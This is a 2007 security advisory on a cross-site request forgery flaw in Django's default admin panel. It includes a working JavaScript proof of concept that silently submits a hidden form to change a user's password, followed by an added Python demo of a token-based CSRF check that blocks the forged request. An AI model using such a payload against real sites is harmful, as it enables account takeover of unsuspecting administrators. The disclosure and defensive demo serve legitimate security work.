
django-csrf.txt

Date: 30 Oct 2007. Reported by J. Carlos Nieto. Type: packetstorm. Source: packetstormsecurity.com

django admin panel CSRF vulnerability fi

Code
`  
Author: J. Carlos Nieto.  
Date: Oct 21, 2007  
  
There is a security hole in the default Django admin panel.  
  
Background  
==========  
Django is a high-level Python Web framework that encourages rapid  
development and clean, pragmatic design.  
Django has an automatic admin panel that allows a person with admin  
privileges to modify the database tables; it also allows changing any  
user's password.  
See more at http://www.djangoproject.com  
  
Summary  
=======  
Django has, by default, no CSRF protection. This may allow an attacker  
to change any user's password by tricking a victim with admin privileges  
into visiting a specially forged web page (even one hosted on a totally  
different server) that silently submits a request to change the password  
of the user with id = n. The victim does not know that the form was sent:  
the browser attaches the victim's admin session cookie to the cross-site  
POST, so the server treats it as a legitimate admin action. If the victim  
has admin privileges the exploit will succeed; otherwise nothing will  
happen.  
  
Severity  
========  
Mild. This problem exists only in the default installation and can be  
easily fixed using the middleware described here:  
http://www.djangoproject.com/documentation/csrf/.  
  
Proof of concept  
================  
<script type="text/javascript">  
window.onload = function() {  
    // Admin change-password URL for the user with id = 1; adjust host and id  
    var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";  
  
    var pass = "funky";  
  
    // Field names of the admin's change-password form  
    var param = {  
        password1: pass,  
        password2: pass  
    };  
  
    // Build a hidden form that POSTs into the invisible iframe below, so the  
    // victim sees nothing; the browser adds the victim's admin session cookie  
    var form = document.createElement('form');  
    form.action = url;  
    form.method = 'post';  
    form.target = 'hidden';  
    form.style.display = 'none';  
  
    for (var i in param) {  
        var input;  
        try {  
            // old IE needs the name set at creation time  
            input = document.createElement('<input name="'+i+'">');  
        } catch(e) {  
            // other browsers  
            input = document.createElement('input');  
            input.name = i;  
        }  
        input.setAttribute('value', param[i]);  
        form.appendChild(input);  
    }  
    document.body.appendChild(form);  
  
    // Submit automatically; the victim does not click anything  
    form.submit();  
}  
</script>  
  
<iframe name="hidden" style="display: none"></iframe>  
  
  
Solution  
========  
Use Django's CSRF protection in all your applications. See  
http://www.djangoproject.com/documentation/csrf/.  
  
  
Disclosure Timeline  
===================  
2007.10.18 - Vulnerability found  
2007.10.18 - Vulnerability reported to vendor  
2007.10.18 - Vendor response  
2007.10.21 - Advisory release  
  
License  
=======  
  
Copyright 2007 J. Carlos Nieto  
  
The contents of this document are licensed under the Creative Commons -  
Attribution / Share Alike license.  
  
`
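The Solution section of the advisory says to enable Django's CSRF protection. As an added illustration (not the advisory's and not Django's own code), the following standalone Python models the synchronizer-token check that such a middleware performs and replays the advisory's forged cross-site POST against it beside a legitimate submission from the admin's own form. The `Request` class, the `users` dict and the `simulate` driver are assumptions for the demo; the `csrfmiddlewaretoken` field name matches what Django's forms use, but nothing else here is Django code.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Added illustration of a synchronizer-token CSRF check. This models what
# a CSRF middleware does; it is NOT Django's implementation.

SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}
TOKEN_FIELD = "csrfmiddlewaretoken"   # same field name Django's forms use


class Request:
    """Hypothetical request object (an assumption for the demo). The browser
    has already attached the victim's session cookie, so the server only sees
    a session and a form body, whichever site caused the POST."""

    def __init__(self, method, path, body=""):
        self.method = method
        self.path = path
        self.body = body

    @property
    def POST(self):
        return {k: v[0] for k, v in parse_qs(self.body).items()}


def issue_token():
    """Per-session secret, stored server-side and rendered into the admin's
    own pages; a page on another origin cannot read it."""
    return secrets.token_hex(32)


def render_password_form(session_token, action):
    """Server-side template for the change-password page: the token travels
    as a hidden field alongside password1/password2."""
    return (
        f'<form method="post" action="{action}">'
        f'<input type="hidden" name="{TOKEN_FIELD}" value="{session_token}">'
        '<input type="password" name="password1">'
        '<input type="password" name="password2">'
        '<input type="submit" value="Change password">'
        '</form>'
    )


def csrf_check(request, session_token):
    """Reject any state-changing request whose submitted token does not
    match the token tied to the caller's session. Returns (allowed, why)."""
    if request.method in SAFE_METHODS:
        return True, "safe method"
    submitted = request.POST.get(TOKEN_FIELD, "")
    if not submitted:
        return False, "missing token"
    # constant-time compare so the check itself does not leak the token
    if not hmac.compare_digest(submitted, session_token):
        return False, "token mismatch"
    return True, "ok"


def change_password_view(request, session_token, users, user_id=1):
    """Simulated admin password view guarded by csrf_check."""
    allowed, why = csrf_check(request, session_token)
    if not allowed:
        return 403, why
    form = request.POST
    if form.get("password1") != form.get("password2"):
        return 400, "passwords differ"
    users[user_id] = form["password1"]
    return 200, "password changed"


def simulate():
    """Replay the advisory's attack against the guarded view, then a real
    submission from the admin's own form. Returns the outcomes and the
    final stored password."""
    users = {1: "original"}                 # constructed stand-in for the DB
    token = issue_token()                   # victim's session token
    path = "/admin/auth/user/1/password/"

    # 1. The forged page from the advisory: the browser sends the cookie,
    #    but the attacker's page could not read the token, so none is sent.
    forged = Request("POST", path, "password1=funky&password2=funky")
    forged_result = change_password_view(forged, token, users)

    # 2. An attacker guessing a token is rejected as well.
    guessed = Request("POST", path,
                      f"password1=funky&password2=funky&{TOKEN_FIELD}={'0' * 64}")
    guessed_result = change_password_view(guessed, token, users)

    # 3. The admin submits the real form rendered with their own token.
    assert token in render_password_form(token, path)
    legit = Request("POST", path,
                    f"password1=s3cret&password2=s3cret&{TOKEN_FIELD}={token}")
    legit_result = change_password_view(legit, token, users)

    return forged_result, guessed_result, legit_result, users[1]


if __name__ == "__main__":
    print(simulate())
```

The point of the replay is the asymmetry: the browser happily adds the session cookie to the forged POST, but the same-origin policy keeps the attacker's page from reading the token rendered into the admin's own form, so the forged and guessed submissions are refused while the genuine one succeeds. Any check that only looks at the cookie, as the default admin did, cannot tell the two apart.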
